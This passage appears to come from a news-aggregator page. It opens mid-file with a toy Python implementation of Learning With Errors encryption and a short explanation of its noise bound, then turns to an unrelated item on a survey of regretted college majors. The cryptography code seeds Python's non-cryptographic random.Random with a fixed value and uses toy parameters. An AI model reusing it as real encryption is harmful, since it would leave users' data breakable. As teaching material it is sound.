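    Recovering s from (A, b) is the Learning With Errors problem."""
    s = [rng.randrange(Q) for _ in range(N)]
    A = [[rng.randrange(Q) for _ in range(N)] for _ in range(M)]
    e = [rng.randint(-2, 2) for _ in range(M)]
    b = [(sum(a * x for a, x in zip(row, s)) + err) % Q for row, err in zip(A, e)]
    return (A, b), s


def encrypt_bit(public, bit, rng):
    """Pick a random subset of the public samples and add them up; the bit
    is hidden by adding q/2 to the scalar part."""
    A, b = public
    r = [rng.randrange(2) for _ in range(M)]
    u = [sum(r[i] * A[i][j] for i in range(M)) % Q for j in range(N)]
    v = (sum(r[i] * b[i] for i in range(M)) + bit * (Q // 2)) % Q
    return u, v


def decrypt_bit(secret, ciphertext):
    """v - <u, s> = sum of the chosen errors (+ q/2 if the bit was 1). With the
    errors bounded by M*2 = 128 < q/4, the two cases are separable."""
    u, v = ciphertext
    w = (v - sum(x * y for x, y in zip(u, secret))) % Q
    return 1 if Q // 4 < w < 3 * Q // 4 else 0


def encrypt_bytes(public, data, rng):
    """Bit-by-bit encryption of a byte string (least significant bit first)."""
    bits = [(byte >> k) & 1 for byte in data for k in range(8)]
    return [encrypt_bit(public, bit, rng) for bit in bits]


def decrypt_bytes(secret, ciphertexts):
    """Inverse of encrypt_bytes."""
    bits = [decrypt_bit(secret, ct) for ct in ciphertexts]
    return bytes(sum(bit << k for k, bit in enumerate(bits[i:i + 8]))
                 for i in range(0, len(bits), 8))


if __name__ == "__main__":
    rng = random.Random(2022)
    public, secret = keygen(rng)
    cts = encrypt_bytes(public, b"pq", rng)
    print(decrypt_bytes(secret, cts))
```

Decryption works only because the accumulated noise stays below q/4; the same bound is what an attacker cannot exploit, since the errors are never revealed and every public sample is a different noisy point. Setting e to all zeros in keygen turns b into A*s and the secret falls to Gaussian elimination mod q, which is the asymmetry the article is describing.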
Education

Survey Reveals the Most-Regretted (and Least-Regretted) College Majors (cnbc.com)

A report from the Georgetown's Center on Education and the Workforce found that Bachelor's degree holders generally earn 84% more than those with just a high school diploma, reports CNBC.

"Still, 44% of all job seekers with college degrees regret their field of study." Journalism, sociology, communications and education all topped the list of most-regretted college majors, according to ZipRecruiter's survey of more than 1,500 college graduates who were looking for a job. "When you are barely managing to pay your bills, your paycheck might become more important." Of graduates who regretted their major, most said that, if they could go back, they would now choose computer science or business administration instead.

All in, the top-paying college majors earn $3.4 million more than the lowest-paying majors over a lifetime.

Graduates entering the workforce with good career prospects and high starting salaries are the most satisfied with their field of study, job site ZipRecruiter also found. Computer science majors, with an average annual starting salary of almost $100,000, were the happiest overall, according to ZipRecruiter. Students who majored in criminology, engineering, nursing, business and finance also felt very good about their choices.
